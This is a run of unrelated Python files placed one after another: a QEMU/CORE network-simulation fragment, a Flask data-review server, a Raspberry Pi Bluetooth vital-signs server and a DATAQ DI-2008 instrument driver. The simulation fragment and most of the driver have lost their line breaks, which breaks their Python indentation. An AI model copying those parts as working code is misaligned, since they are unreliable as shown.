self.configure_bridge() qemu_nodes = self.spawnQEMU(self.session, self.number_of_nodes) while True: time.sleep(0.1) # shutdown session logging.info("Simulation finished. 
Killing all processes") if self.core: self.coreemu.shutdown() os.system("sudo killall xterm") os.system("chown -R " + username + ":" + username + " ./reports") def configure_bridge(self): process = [] for i in range(0,self.number_of_nodes): shell = self.session.get_node(i+1, CoreNode).termcmdstring(sh="/bin/bash") command = "ip tuntap add tap0 mode tap" command += " && ip link add br0 type bridge" command += " && ip link set br0 up" command += " && ip link set tap0 up" command += " && ip link set tap0 master br0" command += " && ip link set bat0 master br0" shell += " -c '" + command + "'" node = subprocess.Popen([ "xterm", "-e", shell], stdin=subprocess.PIPE, shell=False) process.append(node) def spawnQEMU(self, session, number_of_nodes): print("Starting QEMU") nodes = {} for i in range(0,number_of_nodes): shell = session.get_node(i+1, CoreNode).termcmdstring(sh="/bin/bash") command = "qemu-system-x86_64" command += " -m 2048" command += " -boot d -enable-kvm -smp 3" command += " -hda /opt/vms/linux_x86_" + str(i+1) + ".img" command += " -device e1000,netdev=mynet1,mac=DE:AD:BE:EF:00:0" + str(i+1) command += " -netdev tap,id=mynet1,ifname=tap0,script=no" shell += " -c '" + command + "'" node = subprocess.Popen([ "xterm", "-e", shell], stdin=subprocess.PIPE, shell=False) nodes["drone" + str(i)] = node return nodes
review_server.py
#!/usr/bin/env python3

# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.

from flask import Flask, Blueprint, send_file, jsonify, request
import os
import atexit
import signal
import csv
import sys
import time
import threading


def run(
    build_dir,
    port,
    output,
    csv_headers,
    json=False,
    database_task_name=None,
    debug=False,
):
    """
    Serve a single-page review UI that steps through units of data one at a
    time and records the reviewer's verdict for each unit.

    Data is read from stdin (CSV by default, JSON-lines when ``json`` is
    True) or, when ``database_task_name`` is given, from the local Mephisto
    database.  Each submitted result is appended to ``output`` (one line per
    unit), or echoed to stdout when ``output`` is the empty string.  The
    server shuts itself down once every unit has been reviewed.

    :param build_dir: directory holding the prebuilt UI (index.html, static/)
    :param port: TCP port to listen on
    :param output: results file path; '' streams results to stdout
    :param csv_headers: when True, the first CSV row is a header and skipped
    :param json: when True, stdin is JSON-lines rather than CSV
    :param database_task_name: Mephisto task name to review instead of stdin
    :param debug: when False, werkzeug request logging is silenced
    """
    global index_file, app
    global ready_for_next, current_data, finished
    global counter

    if not debug or output == "":
        # disable noisy logging of flask, https://stackoverflow.com/a/18379764
        import logging

        flask_log = logging.getLogger("werkzeug")
        flask_log.disabled = True
        flask_cli = sys.modules["flask.cli"]
        flask_cli.show_server_banner = lambda *x: None

    app = Flask(
        __name__,
        root_path=os.getcwd(),
        static_url_path="/static",
        static_folder=build_dir + "/static",
    )

    def json_reader(f):
        # Local import so the `json` boolean parameter above can shadow the
        # module name without breaking this reader.
        import json

        for jsonline in f:
            yield json.loads(jsonline)

    def mephistoDBReader():
        # Imported lazily: Mephisto is only needed for database-backed review.
        from mephisto.abstractions.databases.local_database import LocalMephistoDB
        from mephisto.tools.data_browser import DataBrowser as MephistoDataBrowser

        db = LocalMephistoDB()
        mephisto_data_browser = MephistoDataBrowser(db=db)

        def format_data_for_review(data):
            contents = data["data"]
            return f"{data}"

        units = mephisto_data_browser.get_units_for_task_name(database_task_name)
        for unit in units:
            yield format_data_for_review(mephisto_data_browser.get_data_from_unit(unit))

    def consume_data():
        # Producer thread: park one row at a time in `current_data` and block
        # on `ready_for_next` until /submit_current_task releases it.
        global ready_for_next, current_data, finished, counter

        if database_task_name is not None:
            data_source = mephistoDBReader()
        elif json:
            data_source = json_reader(iter(sys.stdin.readline, ""))
        else:
            data_source = csv.reader(iter(sys.stdin.readline, ""))
            if csv_headers:
                next(data_source)

        finished = False
        counter = 0
        for row in data_source:
            ready_for_next = threading.Event()
            current_data = row
            counter += 1
            ready_for_next.wait()
        finished = True

    @app.route("/data_for_current_task")
    def data():
        global current_data, finished

        if finished:
            # Every unit has been reviewed: ask werkzeug to stop the server.
            func = request.environ.get("werkzeug.server.shutdown")
            if func is None:
                raise RuntimeError("Not running with the Werkzeug Server")
            func()

        return jsonify(
            {"finished": finished, "data": current_data if not finished else None}
        )

    @app.route("/submit_current_task", methods=["GET", "POST"])
    def next_task():
        global current_data, ready_for_next, finished, counter

        result = (
            request.get_json(force=True)
            if request.method == "POST"
            # BUGFIX: was `request.ags`, which raised AttributeError on
            # every GET submission; the Flask query-string mapping is
            # `request.args`.
            else request.args.get("result")
        )

        if output == "":
            sys.stdout.write("{}\n".format(result))
            sys.stdout.flush()
        else:
            with open(output, "a+") as f:
                f.write("{}\n".format(result))

        # Release the producer thread so it can stage the next row.
        ready_for_next.set()
        time.sleep(0)
        return jsonify({"finished": finished, "counter": counter})

    @app.route("/")
    def index():
        global index_file
        return send_file(build_dir + "/index.html")

    @app.after_request
    def after_request(response):
        # Permissive CORS so a dev UI served from another origin can use the API.
        response.headers.add("Access-Control-Allow-Origin", "*")
        response.headers.add(
            "Access-Control-Allow-Headers", "Content-Type,Authorization"
        )
        response.headers.add(
            "Access-Control-Allow-Methods", "GET,PUT,POST,DELETE,OPTIONS"
        )
        response.headers.add("Cache-Control", "no-store")
        return response

    thread = threading.Thread(target=consume_data)
    thread.start()
    if sys.stdout.isatty():
        print("Running on http://127.0.0.1:{}/ (Press CTRL+C to quit)".format(port))
    app.run(debug=False, port=port)
bluetooth_server_module.py
import queue
import time
import threading
import bluetooth
import math
import random
import socket
import subprocess  # for Raspberry Pi shutdown
import os


class BluetoothServer:
    """RFCOMM server that streams heart-rate / respiration-rate readings to
    every connected phone and reacts to text commands sent back by the app
    ('poweroff', 'startMeasure', 'stopMeasure', 'write').

    Shared state (`go`, queues, `run_measurement`, ...) arrives through the
    `list_of_variables_for_threads` dict and is mutated in place so the other
    worker threads observe the changes.  NOTE(review): `go` is used as a
    truthy sentinel that is emptied via .pop(0) — presumably a one-element
    list; confirm against the main program.
    """
    # run = True # Argument for shutting down all loops at the same time with input from one device.

    def __init__(self, list_of_variables_for_threads):
        # List of all variables from main to class.
        self.list_of_variables_for_threads = list_of_variables_for_threads
        self.go = list_of_variables_for_threads["go"]

        # Bluetooth variables
        self.client_list = []    # list for each connected device, sockets
        self.address_list = []   # list for mac-addresses from each connected device
        # self.read_thread_list = [] # list for threads to receive from each device
        self.host = ""
        self.port = 1
        self.client = None

        # Setup server for bluetooth communication
        self.server = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
        # Makes server.accept() non-blocking, used for "poweroff".
        # NOTE(review): non-blocking accept makes connect_device spin-loop;
        # confirm this busy-wait is acceptable on the target Pi.
        self.server.setblocking(0)

        # TEMP: Data from radar used to make sure data can be accepted between threads
        # Queue from radar class to test if queue communication works.
        # NOTE(review): RR_final_queue is used with len() here but with
        # .empty()/.get_nowait() elsewhere — it cannot be a plain queue.Queue;
        # confirm its actual type.
        self.RR_final_queue = list_of_variables_for_threads["RR_final_queue"]
        self.RTB_final_queue = list_of_variables_for_threads["RTB_final_queue"]
        self.run_measurement = list_of_variables_for_threads["run_measurement"]
        self.start_write_to_csv_time = list_of_variables_for_threads["start_write_to_csv_time"]
        self.initiate_write_heart_rate = list_of_variables_for_threads["initiate_write_heart_rate"]

        print('Bluetooth Socket Created')
        try:
            self.server.bind((self.host, self.port))
            print("Bluetooth Binding Completed")
        except:
            print("Bluetooth Binding Failed")

        # Can be accessed from main-program to wait for it to close by .join()
        self.connect_device_thread = threading.Thread(
            target=self.connect_device)  # Starts thread which accepts new devices
        self.connect_device_thread.start()

    def app_data(self):
        # The main loop which takes data from processing and sends data to
        # all clients.  NOTE(review): the loop body is currently a no-op
        # (everything is commented out) — it only spins until `go` is emptied.
        while self.go:
            pass
            # while len(self.client_list) == 0:
            #     time.sleep(1)
            #     continue
            # self.schmitt_to_app()
            # self.real_time_breating_to_app()
            # data = self.add_data(2)  # TEMP: Makes random data for testing of communication
            # data_pulse, data_breath = data.split(' ')  # Splits data in pulse and heart rate
            # self.write_data_to_app(data_pulse, 'heart rate')  # Sends pulse to app
            # self.write_data_to_app(data_breath, 'breath rate')  # Sends heart rate to app

    def schmitt_to_app(self):
        # Forward one respiration-rate value from the Schmitt-trigger queue
        # to every connected app; swallows any error as a queue timeout.
        try:
            # TEMP: Takes data from Schmitt trigger
            while len(self.RR_final_queue) == 0 and self.go:
                time.sleep(0.001)
            schmitt_data = self.RR_final_queue.get_nowait()
            # print("got data from queue")
            self.write_data_to_app(schmitt_data, 'breath rate')
            # schmitt_data = ' BR ' + schmitt_data + ' '  # TODO change to RR instead of BR in the app as well
            # print("made string")
            # self.send_data(schmitt_data)
            # print("sent data")
        except:
            print("timeout RR queue")

    def real_time_breating_to_app(self):
        # Forward one filtered real-time breathing sample, plus a pending
        # respiration-rate value if one is queued.
        try:
            # while self.RTB_final_queue.empty() and self.go:
            #     time.sleep(0.005)
            # TEMP: Takes data from filtered resp.rate
            real_time_breating_to_app = self.RTB_final_queue.get_nowait()
            # print("Real time breathing to app {}".format(real_time_breating_to_app))
            self.write_data_to_app(real_time_breating_to_app, 'real time breath')
            if not self.RR_final_queue.empty():
                schmitt_data = self.RR_final_queue.get_nowait()
                self.write_data_to_app(schmitt_data, 'breath rate')
        except:
            print(len(self.RR_final_queue))

    def connect_device(self):
        # Accept loop: registers each new phone and spawns a reader thread
        # for it; joins all readers once `go` is cleared.
        #os.system("echo 'power on\nquit' | bluetoothctl") # Startup for bluetooth on rpi TODO
        thread_list = []  # List which adds devices
        self.server.listen(7)  # Amount of devices that can simultaneously receive data.
        while self.go:
            # Loop which listens for a new device, adds it to our list
            # and starts a new thread for listening on input from device.
            try:
                c, a = self.server.accept()
            except:
                # Non-blocking accept raises until a connection is pending.
                if self.go == False:
                    break
                # print("Still accepting new phones" + str(error))
                continue
            self.client_list.append(c)
            self.address_list.append(a)
            # one thread for each connected device
            thread_list.append(threading.Thread(target=self.read_device))
            thread_list[-1].start()
            # NOTE(review): Thread.getName()/isAlive() were removed in
            # Python 3.9 — use .name / .is_alive(); confirm target version.
            print(thread_list[-1].getName())
            print(thread_list[-1].isAlive())
            print("New client: ", a)
        print("Out of while True in connect device")
        # Gracefully close all device threads
        for thread in thread_list:
            print(str(thread.getName()) + str(thread.isAlive()))
            thread.join()
            print(str(thread.getName()) + " is closed")
        print("End of connect_device thread")

    def read_device(self):
        # Per-client reader: decodes newline-ish text commands from the app.
        # NOTE(review): picking client_list[-1] races with a concurrent
        # accept in connect_device — confirm only one phone connects at a
        # time, or pass the socket in explicitly.
        c = self.client_list[-1]  # Takes last added device and connects it.
        print(c)
        print(self.address_list[-1])
        try:
            while self.go:
                data = c.recv(1024)  # Input argument from device
                data = data.decode('utf-8')
                data = data.strip()
                print(data)
                # When device sends "poweroff" initiate shutdown by clearing
                # go, removing all clients and closing all threads.
                if data == 'poweroff':
                    print("Shutdown starting")
                    try:
                        #self.go = []
                        #self.list_of_variables_for_threads["go"] = self.go.pop(0)
                        #list_of_variables_for_threads["go"] = go.pop(0)
                        self.go.pop(0)
                        print("go= " + str(self.go))
                        for client in self.client_list:
                            print('try to remove client ' + str(self.address_list[self.client_list.index(client)]))
                            client.close()
                            print('remove client ' + str(self.address_list[self.client_list.index(client)]))
                        self.server.close()
                        print("server is now closed")
                        os.system("echo 'power off\nquit' | bluetoothctl")  # TODO
                    except Exception as error:
                        print("exception in for-loop in read_device: " + str(error))
                # Same teardown runs when another thread already cleared go.
                if not self.go:
                    print("Shutdown starting")
                    try:
                        #self.go = []
                        #self.list_of_variables_for_threads["go"] = self.go.pop(0)
                        #list_of_variables_for_threads["go"] = go.pop(0)
                        # self.go.pop(0)
                        print("go= " + str(self.go))
                        for client in self.client_list:
                            print('try to remove client ' + str(self.address_list[self.client_list.index(client)]))
                            client.close()
                            print('remove client ' + str(self.address_list[self.client_list.index(client)]))
                        self.server.close()
                        print("server is now closed")
                        os.system("echo 'power off\nquit' | bluetoothctl")  # TODO
                    except Exception as error:
                        print("exception in for-loop in read_device: " + str(error))
                elif data == 'startMeasure':
                    # Register this client as a measurement consumer.
                    self.run_measurement.append(c)
                    self.list_of_variables_for_threads["run_measurement"] = self.run_measurement
                    print("Device added")
                elif data == 'stopMeasure':
                    if c in self.run_measurement:
                        self.run_measurement.remove(c)
                        self.list_of_variables_for_threads["run_measurement"] = self.run_measurement
                        print("Device removed")
                elif data == 'write':
                    # Kick off CSV logging of heart-rate data.
                    print("Bluetooth Write started")
                    self.initiate_write_heart_rate.append(0)
                    self.list_of_variables_for_threads["initiate_write_heart_rate"] = self.initiate_write_heart_rate
                    self.start_write_to_csv_time = time.time()
                    self.list_of_variables_for_threads["start_write_to_csv_time"] = self.start_write_to_csv_time
                    # self.initiate_write_heart_rate
        except Exception as error:
            # Socket died (client disconnected): drop this client everywhere.
            print("last exception read_device: " + str(error))
            c.close()
            print('remove client: ' + str(self.address_list[self.client_list.index(c)]))
            if c in self.run_measurement:
                self.run_measurement.remove(c)
            self.client_list.remove(c)

    def write_data_to_app(self, data, data_type):
        # Tag the value with its type marker and broadcast it.
        # print(data + ' ' + data_type)
        if data_type == 'heart rate':
            string = ' HR ' + str(data) + ' '
            # print(string)
            self.send_data(string)
        elif data_type == 'breath rate':
            string = ' RR ' + str(data) + ' '
            # print(string)
            self.send_data(string)
        elif data_type == 'real time breath':
            string = ' RTB ' + str(data) + ' '
            self.send_data(string)

    def send_data(self, write):
        # Broadcast the same payload to every connected client.
        # print('Send data: ' + write)
        for client in self.client_list:  # Send the same data to all clients connected
            try:
                client.send(write.encode('utf-8'))  # write.encode('utf-8')
            except Exception as error:
                print("Error send_data" + str(error))

    def add_data(self, i):
        # TEMP: Make data somewhat random (fake pulse + breath pair for tests).
        data = [70 + math.sin(i), 20 + math.sin(i + math.pi / 4)]
        noise = random.random()
        data[0] += 5 * (noise - 0.5)
        noise = random.random()
        data[1] += noise
        data[0] = round(data[0])
        data[1] = round(data[1])
        return str(data[0]) + ' ' + str(data[1])

    # def get_data_from_queue(self):
    #     self.send_to_app_queue.put(self.add_data(1))
    #     return self.send_to_app_queue.get()

    # @staticmethod  # Test to send run variable to other threads, does not work yet.
    # def get_run(self):
    #     return self.run
instrument.py
""" Implements some of the functionality of the DATAQ DI-2008 data acquisition module. """ from datetime import datetime, timedelta from enum import Enum import logging import threading from time import sleep from typing import List from serial import Serial from serial.tools import list_ports from serial.serialutil import SerialException _logger = logging.getLogger(__name__) def _discover_auto(): candidate_ports = [] available_ports = list(list_ports.comports()) for p in available_ports: # Do we have a DATAQ Instruments device? if "VID:PID=0683" in p.hwid: candidate_ports.append(p.device) _logger.debug(f'DI-2008 instruments detected on: {", ".join(candidate_ports)}') try: return candidate_ports[0] except IndexError: return None def _discover_by_esn(serial_number: str): buffering_time = 0.2 correct_port = None candidate_ports = [] available_ports = list(list_ports.comports()) for p in available_ports: # Do we have a DATAQ Instruments device? if "VID:PID=0683" in p.hwid: candidate_ports.append(p.device) _logger.debug(f'DI-2008 instruments detected on: {", ".join(candidate_ports)}') for port_name in candidate_ports: _logger.info(f'checking candidate port {port_name}...') if correct_port is not None: break try: port = Serial(port_name, baudrate=115200) except SerialException: _logger.warning(f'candidate port {port_name} not accessible') port = None if port is not None: message = '' while 'stop' not in message: port.flush() port.write(f'stop\r\n'.encode()) sleep(buffering_time) data = port.read(port.in_waiting) characters = [chr(b) for b in data if b != 0] message = ''.join(characters).strip() _logger.debug(f'stop command response: {message}') port.write(f'info 6\r\n'.encode()) sleep(buffering_time) data = port.read(port.in_waiting) _logger.debug(f'data from {port_name}: {data}') characters = [chr(b) for b in data if b != 0] message = ''.join(characters).strip() _logger.debug(f'message from {port_name}: {message}') parts = message.strip().split(' ') if len(parts) == 3: 
esn = parts[2] if esn == serial_number.upper(): correct_port = port_name port.close() if correct_port is None: _logger.warning(f'DI-2008 serial number {serial_number} not found') else: _logger.info(f'DI-2008 serial number {serial_number} found on {correct_port}') return correct_port class AnalogPortError(Exception): """ Raised when there is an analog-port related error on the DI-2008 """ pass class DigitalPortError(Exception): """ Raised when there is a digital port related error on the DI-2008 """ pass class PortNotValidError(Exception): """ Raised when there is a port access attempted where a physical port does \ not exist. """ pass class DigitalDirection(Enum): """ Used to set the direction """ INPUT = 0 """Indicates that the port direction is to be an input""" OUTPUT = 1 """Indicates that the port direction is to be an output""" class Port: _mode_bit = 12 _range_bit = 11 _scale_bit = 8 def __init__(self, callback: callable=None, loglevel=logging.DEBUG): self._logger = logging.getLogger(self.__class__.__name__) self._logger.setLevel(loglevel) self._callback = callback self.value = None self._last_received = None self.configuration = 0 self.commands = [] @property def is_active(self): age = datetime.now() - self._last_received max_age = timedelta(seconds=3) if self._last_received is None or (age > max_age): self._logger.info(f'{self} does not appear to be active') return False return True def parse(self, value): raise NotImplementedError class AnalogPort(Port): """ Analog input port which may be configured as a strict voltage monitor or \ as a thermocouple input. 
:param channel: integer, the channel number as seen on the front of \ the devices, which is to say, the first channel is ``1`` instead of ``0`` :param analog_range: float, the expected range when configurated as an \ analog input; valid values are in [0.01, 0.025, 0.05, 0.1, 0.25, 0.5, \ 1.0, 2.5, 5.0, 10.0, 25.0, 50.0] while invalid values will raise a \ ``ValueError`` :param thermocouple_type: string, a single letter denoting the \ thermocouple type; valid values are in ['b', 'e', 'j', 'k', 'n', 'r', \ 's', 't'] and invalid values will raise a ``ValueError`` :param filter: string, a string containing 'last point', 'average', \ 'maximum' or 'minimum' as defined in the device datasheet :param filter_decimation: int, an integer containing the number of \ samples over which to filter as defined in the device datasheet :param loglevel: the logging level, i.e. ``logging.INFO`` """ def __init__(self, channel: int, analog_range: float = None, thermocouple_type: str = None, filter: str = 'last point', filter_decimation: int = 10, loglevel=logging.INFO): super().__init__(loglevel=loglevel) if channel == 0: raise AnalogPortError(f'channel 0 is invalid, note that the ' f'channel numbers line up with the hardware.') if channel not in range(1, 9): raise AnalogPortError(f'channel "{channel}" is invalid, ' f'expected 1 to 8, inclusivie') configuration = channel - 1 if analog_range is not None and thermocouple_type is not None: raise ValueError(f'analog range and thermocouple type are ' f'both specified for analog channel {channel}') if analog_range is not None: valid_ranges = [0.01, 0.025, 0.05, 0.1, 0.25, 0.5, 1.0, 2.5, 5.0, 10.0, 25.0, 50.0] if analog_range not in valid_ranges: strings = [str(v) for v in valid_ranges] raise ValueError('valid values for analog range: ' f'{", ".join(strings)}') if analog_range >= 1.0: configuration |= (1 << self._range_bit) # set the range bit analog_range /= 100 # change the range to make lookup easier range_lookup = { 0.5: 0, 0.25: 1, 0.1: 2, 
0.05: 3, 0.025: 4, 0.01: 5 } configuration |= (range_lookup[analog_range] << self._scale_bit) if thermocouple_type is not None: if thermocouple_type.lower() not in 'bejknrst': self._logger.warning(f'thermocouple type must be valid') return configuration |= 1 << self._mode_bit # set the mode bit thermo_lookup = { 'b': 0, 'e': 1, 'j': 2, 'k': 3, 'n': 4, 'r': 5, 's': 6, 't': 7 } configuration |= (thermo_lookup[thermocouple_type.lower()] << self._scale_bit) filter_types = ['last point', 'average', 'maximum', 'minimum'] if filter.lower() not in filter_types: raise ValueError(f'the "filter" must be one of the following: ' f'{", ".join(filter_types)}') if filter_decimation < 1 or filter_decimation > 32767: raise ValueError('the "filter_decimation" parameter must be ' 'between 1 and 32767, inclusive') filter_value = filter_types.index(filter.lower()) self.configuration = configuration self.commands += [f'filter {channel-1} {filter_value}', f'dec {filter_decimation}'] @property def _is_tc(self): """ Return 'True' if is a thermocouple, else 'False' """ return (self.configuration & (1 << self._mode_bit)) > 0 def __str__(self): channel = (self.configuration & 0xf) + 1 string = f'analog input, channel {channel} ' if self._is_tc: # string construction for thermocouple type string += 'thermocouple ' tc_ranges = { 0: 'B', 1: 'E', 2: 'J', 3: 'K', 4: 'N', 5: 'R', 6: 'S', 7: 'T' } tc_type = tc_ranges[(self.configuration & (0x7 << self._scale_bit)) >> self._scale_bit] string += f'type {tc_type}' else: string += 'range ' ranges = [0.5, 0.25, 0.1, 0.05, 0.025, 0.01] range_bit = self.configuration & (1 << self._range_bit) if range_bit: ranges = [r * 100 for r in ranges] scale_factor = (self.configuration & (0x7 << self._scale_bit)) >> self._scale_bit range_value = ranges[scale_factor] string += f'+/-{range_value}V' return string def parse(self, input): """ The ``parse`` method is intended to be called by the Di2008 \ class when it receives data associated with the ``AnalogPort``. 
:param input: 16-bit integer input representing the 'raw' data stream :return: """ self._last_received = datetime.now() if self._is_tc: if input == 32767: self.value = None self._logger.warning('!!! thermocouple error, cannot ' 'communicate with sensor or the reading ' 'is outside the sensor\'s measurement ' f'range on "{str(self)}"') return elif input == -32768: self.value = None self._logger.warning(f'!!! thermocouple error, thermocouple ' f'open or not connected on "{str(self)}"') return # from datasheet... m_lookup = { 'j': 0.021515, 'k': 0.023987, 't': 0.009155, 'b': 0.023956, 'r': 0.02774, 's': 0.02774, 'e': 0.018311, 'n': 0.022888 } b_lookup = { 'j': 495, 'k': 586, 't': 100, 'b': 1035, 'r': 859, 's': 859, 'e': 400, 'n': 550 } tc_ranges = { 0: 'b', 1: 'e', 2: 'j', 3: 'k', 4: 'n', 5: 'r', 6: 's', 7: 't' } tc_type = tc_ranges[(self.configuration & (0x7 << self._scale_bit)) >> self._scale_bit] m = m_lookup[tc_type] b = b_lookup[tc_type] self.value = input * m + b self._logger.debug(f'input value "{input}" converted for ' f'"{str(self)}" is "{self.value:.2f}°C"') if self._callback: self._callback(self.value) return self.value ranges = [0.5, 0.25, 0.1, 0.05, 0.025, 0.01] range_bit = self.configuration & (1 << self._range_bit) if range_bit: ranges = [r * 100 for r in ranges] scale_factor = (self.configuration & (0x7 << self._scale_bit)) \ >> self._scale_bit range_value = ranges[scale_factor] self.value = range_value * float(input) / 32768.0 self._logger.debug(f'input value "{input}" converted for ' f'"{str(self)}" is "{self.value:.4f}V"') if self._callback: self._callback(self.value) return self.value class RatePort(Port): """ Digital input port which may be configured as a frequency monitor. 
:param range_hz: the maximum range of the input, in Hz; valid values are \ in [50000, 20000, 10000, 5000, 2000, 1000, 500, 200, 100, 50, 20, 10] and \ invalid values will raise a ``ValueError`` :param filter_samples: filter samples as defined within the device \ datasheet :param loglevel: the logging level, i.e. ``logging.INFO`` """ def __init__(self, range_hz=50000, filter_samples: int = 32, loglevel=logging.INFO): super().__init__(loglevel=loglevel) rates_lookup = { 50000: 1, 20000: 2, 10000: 3, 5000: 4, 2000: 5, 1000: 6, 500: 7, 200: 8, 100: 9, 50: 10, 20: 11, 10: 12 } valid_rates = [r for r in rates_lookup.keys()] if range_hz not in valid_rates: raise ValueError(f'rate not valid, please choose a valid rate ' f'from the following: {", ".join(valid_rates)}') if not 1 <= filter_samples <= 64: raise ValueError(f'filter_samples not valid, must be ' f'between 1 and 64, inclusive') self.configuration = (rates_lookup[range_hz] << self._scale_bit) + 0x9 self.commands += [f'ffl {filter_samples}'] self._range = range_hz def __str__(self): return f'rate input, {self._range}Hz' def parse(self, input): self._last_received = datetime.now() self.value = self._range * (input + 32768) / 65536 self._logger.debug(f'input value "{input}" converted for ' f'"{str(self)}" is "{self.value:.4f}Hz"') if self._callback: self._callback(self.value) return self.value class CountPort(Port): """ todo: Implement and document CountPort """ def __init__(self, loglevel=logging.DEBUG): super().__init__(loglevel=loglevel) self.configuration = 0xa raise NotImplementedError class DigitalPort(Port): """ A digital input/output port. :param channel: an integer corresponding to the digital channels as seen \ on the front face of the device (zero-indexed) :param output: a boolean value, ``True`` if the channel is to be an output \ else false. :param loglevel: the logging level to apply to the digital port. 
""" def __init__(self, channel: int, direction: DigitalDirection = DigitalDirection.INPUT, loglevel=logging.INFO): super().__init__(loglevel=loglevel) if channel not in range(0, 7): raise DigitalPortError(f'channel "{channel}" ' 'is not a valid digital channel') self.channel = channel self.direction = direction self.value = False def __repr__(self): direction = 'output' \ if self.direction == DigitalDirection.OUTPUT else 'input' return f'digital {direction} ' \ f'{self.channel}' class Di2008: """ The device controller which implements its own ``threading.Thread`` class \ and processes incomming data based on its defined scan list. The ``port_name`` and ``serial_number`` allow the user to specify a particular device on the bus when there may be more than one device present on the bus. If both ``port_name`` and ``serial_number`` are specified, then ``serial_number`` will take precedence. If neither are specified, then the first instrument found on the bus will be automatically acquired. :param port_name: the COM port (if not specified, the software will \ attempt to find the device) :param serial_number: the serial number of the device to acquire :param timeout: the period of time over which input data is pulled from \ the serial port and processed :param loglevel: the logging level, i.e. 
    ``logging.INFO``
    """
    def __init__(self, port_name: str = None, serial_number: str = None,
                 timeout=0.05, loglevel=logging.INFO):
        self._logger = logging.getLogger(self.__class__.__name__)
        self._logger.setLevel(loglevel)

        self._timeout = timeout      # worker-thread polling period, seconds
        self._scanning = False       # True while the device streams scan data
        self._scan_index = 0         # next scan-list slot to receive a sample
        self._serial_port = None
        self._ports = []             # the active scan list (list of Port)
        # the seven digital channels, D0-D6
        self._dio = [DigitalPort(x) for x in range(0, 7)]
        self._raw = []               # accumulated chars of partial messages
        self._manufacturer = None
        self._pid = None
        self._firmware = None
        self._esn = None

        # initialize the command queue with basic information requests
        self._command_queue = [
            'stop', 'info 0', 'info 1', 'info 2', 'info 6', 'srate 4'
        ]

        # _discover() raises ValueError when no device is found, so the
        # worker thread only starts for a successfully acquired device
        success = self._discover(port_name, serial_number)
        if success:
            self._thread = threading.Thread(target=self._run)
            self._thread.start()

    def __str__(self):
        return f'{self._manufacturer} DI-{self._pid}, serial number ' \
               f'{self._esn}, firmware {self._firmware}'

    def change_led_color(self, color: str):
        """
        Change the LED color.

        :param color: the color as a string; valid values are in \
        ['black', 'blue', 'green', 'cyan', 'red', 'magenta', 'yellow', \
        'white'] and invalid values will raise a ``ValueError``
        :return: None
        """
        # maps the color name to the device's 'led' command argument
        colors_lookup = {
            'black': 0, 'blue': 1, 'green': 2, 'cyan': 3,
            'red': 4, 'magenta': 5, 'yellow': 6, 'white': 7
        }
        valid_colors = [c for c in colors_lookup.keys()]
        if color.lower() not in valid_colors:
            raise ValueError(f'color not valid, should be one of '
                             f'{", ".join(valid_colors)}')

        self._command_queue.append(f'led {colors_lookup[color.lower()]}')

    def setup_dio_direction(self, channel: int, direction: DigitalDirection):
        """
        Setup the digital port direction for a single port.
        :param channel: the channel number
        :param direction: the ``DigitalDirection``
        :return: None
        """
        if channel not in range(0, 7):
            raise PortNotValidError('the specified port/channel '
                                    f'"{channel}" does not exist')

        self._logger.info(f'setting digital channel {channel} to {direction}')

        directions = 0x00

        # load the directions from the current dio
        for i, port in enumerate(self._dio):
            value = 1 if port.direction == DigitalDirection.OUTPUT else 0
            directions |= value << i

        # modify the direction for the appropriate channel
        if direction == DigitalDirection.OUTPUT:
            directions |= 1 << channel
        else:
            directions &= ~(1 << channel)
        self._dio[channel].direction = direction

        # 'endo' programs the full input/output direction bitmask at once
        self._command_queue.append(f'endo {directions}')

    def write_do(self, channel: int, state: bool):
        """
        Writes to any of the digital pins in the switch state.

        :param channel: an integer indicating the digital output
        :param state: the value, ``True`` or ``False``; ``True`` releases the \
        internal switch, meaning that the output will float up to 5V while \
        ``False`` will activate the internal switch, pulling the node to 0V
        :return: None
        """
        if channel not in range(0, 7):
            raise PortNotValidError('the specified port/channel '
                                    f'"{channel}" does not exist')

        self._logger.info(f'setting digital channel {channel} to {state}')

        values = 0x00
        for i, dio in enumerate(self._dio):
            if dio.direction == DigitalDirection.OUTPUT:
                # the wire bits are inverted with respect to `state`: bit 0
                # releases the switch (float high), bit 1 engages it
                # (pull low) - see the docstring above
                if channel == i:
                    state_value = 0 if state else 1
                    values |= state_value << i
                    dio.value = state
                else:
                    # preserve the last commanded state of the other outputs
                    state_value = 0 if dio.value else 1
                    values |= state_value << i
        self._command_queue.append(f'dout {values}')

    def read_di(self, channel: int):
        """
        Reads the state of any digital input/output

        :param channel: the channel number as shown on the instrument
        :return: True if the channel is high, else False
        """
        if channel not in range(0, 7):
            raise PortNotValidError('the specified port/channel '
                                    f'"{channel}" does not exist')

        # returns the cached value maintained by the background 'din' polling
        return self._dio[channel].value

    def create_scan_list(self, scan_list: List[Port]):
        """
        Builds the
scan list. This must be done while the instrument is not \ currently scanning or results are unpredictable. :param scan_list: a list of ``Port`` types. :return: True if success, else False """ # create a scan list based on the provided list for port in scan_list: if not isinstance(port, Port): raise ValueError(f'"{port}" is not an instance of Port class') if len(scan_list) > 11: raise ValueError('scan list may only be a maximum ' 'of 11 elements long') # todo: check for duplicates and raise ValueError if duplicate detected self._ports = scan_list # change the packet size based on the scan list length if len(scan_list) < 8: packet_size_id = 0 elif len(scan_list) < 16: packet_size_id = 1 elif len(scan_list) < 32: packet_size_id = 2 else: packet_size_id = 3 self._command_queue.append(f'ps {packet_size_id}') # create the scan list commands = [f'slist {offset} {port.configuration}' for offset, port in enumerate(self._ports)] # add any other port-specific commands for port in self._ports: for command in port.commands: commands.append(command) commands.append('info 9') # shift the entire command list into the transmit queue [self._command_queue.append(c) for c in commands] return True def start(self): """ Starts the device scanning. The scan list must already be defined \ using ``create_scan_list`` method. :return: None """ self._command_queue.append('start') def stop(self): """ Stops the device scanning. :return: """ self._command_queue.append('stop') def close(self): """ Release the device and serial port. 
        :return: None
        """
        self._logger.warning('closing port')
        if self._serial_port:
            self._serial_port.close()
            self._serial_port = None

    def _recover_buffer_overflow(self):
        # drop everything queued, halt the scan, then rebuild the scan list
        # and restart from a clean state
        self._command_queue = []
        self.stop()
        self.create_scan_list(self._ports)
        self.start()

    def _discover(self, port_name: str = None, serial_number: str = None):
        # serial_number takes precedence over an explicit port name
        if serial_number is not None:
            port_name = _discover_by_esn(serial_number)
        elif port_name is None:
            port_name = _discover_auto()

        if port_name:
            self._logger.info(f'device found on {port_name}')
            self._serial_port = Serial(port_name, baudrate=115200, timeout=0)
            return True

